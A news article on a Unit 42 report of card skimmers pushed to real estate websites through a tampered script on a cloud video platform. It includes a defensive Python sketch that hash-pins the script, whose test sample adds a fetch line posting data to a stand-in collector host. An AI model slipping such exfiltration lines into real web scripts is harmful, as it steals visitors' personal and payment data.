
Web skimming attacks on hundreds of real estate websites deployed via cloud video hosting service

Web skimming attacks are targeting hundreds of real estate websites via a cloud-based video hosting service, researchers have warned.

A blog post from Unit 42, the research arm of Palo Alto Networks, revealed how attackers are using the service to carry out a supply chain attack to inject card skimming malware onto victim sites.

Web skimming attacks occur when malicious script is injected into sites to steal information entered into web forms.

For example, an online booking form might ask for a website user’s personal details and payment information. If this site was vulnerable to skimming attacks, the malicious actors could intercept the data.

The Unit 42 blog post reads: “Recently, we found a supply chain attack leveraging a cloud video platform to distribute skimmer (aka ‘formjacking’) campaigns.

“In the case of the attacks described here, the attacker injected the skimmer JavaScript codes into video, so whenever others import the video, their websites get embedded with skimmer codes as well.”

The researchers detailed how the skimmer infected the websites, explaining that when the cloud platform user creates a video player, the user is allowed to add their own JavaScript customizations by uploading a .js file to be included in their player.

In this specific instance, the user uploaded a script that could be modified upstream to include malicious content.

The post reads: “We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player.

“From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server, https://cdn-imgcloud[.]com/img, which is also marked as malicious in VirusTotal.”
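A defensive sketch of the gap described above, added here as an example and not code from Unit 42 or the video platform: a re-ingestion gate that pins the reviewed copy of a customer-supplied script and refuses a copy that has changed at its hosted location. The function names, the sample scripts and the `stats.example` and `collector.example` hosts are constructed assumptions.

```python
import base64
import hashlib
import re
from urllib.parse import urlsplit

# Constructed sample inputs (not taken from the Unit 42 report).
REVIEWED_JS = b'player.on("ready", function () { track("https://stats.example/p"); });\n'
ALTERED_JS = REVIEWED_JS + b'fetch("https://collector.example/img", {method: "POST"});\n'

# Absolute http(s) URLs written literally in the script source.
URL_RE = re.compile(rb"""https?://[^\s"'<>)\\]+""")


def sri_digest(body: bytes) -> str:
    """Return the Subresource Integrity value (sha384, base64) for a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()


def referenced_hosts(body: bytes) -> set[str]:
    """Hosts of every absolute URL that appears literally in the script."""
    hosts = {urlsplit(m.decode("utf-8", "replace")).hostname or ""
             for m in URL_RE.findall(body)}
    return hosts - {""}


def pin(body: bytes) -> dict:
    """Record what was reviewed: the digest and the hosts the script contacts."""
    return {"integrity": sri_digest(body), "hosts": referenced_hosts(body)}


def check_reingest(pinned: dict, fetched: bytes) -> dict:
    """Decide whether a freshly fetched copy may be bundled into the player."""
    digest = sri_digest(fetched)
    changed = digest != pinned["integrity"]
    return {
        "allow": not changed,  # any byte change requires a new review
        "integrity": digest,
        # Hosts absent from the reviewed copy are the first thing to triage.
        "new_hosts": sorted(referenced_hosts(fetched) - pinned["hosts"]),
    }


if __name__ == "__main__":
    baseline = pin(REVIEWED_JS)
    print(check_reingest(baseline, REVIEWED_JS))
    print(check_reingest(baseline, ALTERED_JS))
```

The host diff only sees URLs written literally in the source, so the digest comparison is the actual control; the same `integrity` value can be placed on a `<script>` tag so browsers reject a modified file.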

Closing the backdoor

The websites in question were all owned by the same parent company, which hasn’t been named.

Unit 42 researchers said they have informed the organization and have helped them to remove the malware.

The blog post contains more technical information on how the skimmer operates.

Trevor Morgan, product manager at comforte AG, commented: “As these types of attacks continue to evolve in sophistication and cleverness, enterprises need to remain focused on the basics: develop a defensive strategy incorporating more than just perimeter-based security, don’t assume that cloud-based services are inherently safe without proper due diligence, and put a priority on emerging data-centric security methods such as tokenization and format-preserving encryption, which can apply protections directly to the sensitive data that threat actors are after.

“Tokenizing data as soon as it enters your enterprise workflows means that business applications and users can continue to work with that information in a protected state, but more importantly if the wrong people get ahold of it, either inadvertently or through coordinated attacks like this one, the sensitive information remains obfuscated so that threat actors cannot leverage it for gain.”


Source: https://portswigger.net/daily-swig/web-skimming-attacks-on-hundreds-of-real-estate-websites-deployed-via-cloud-video-hosting-service
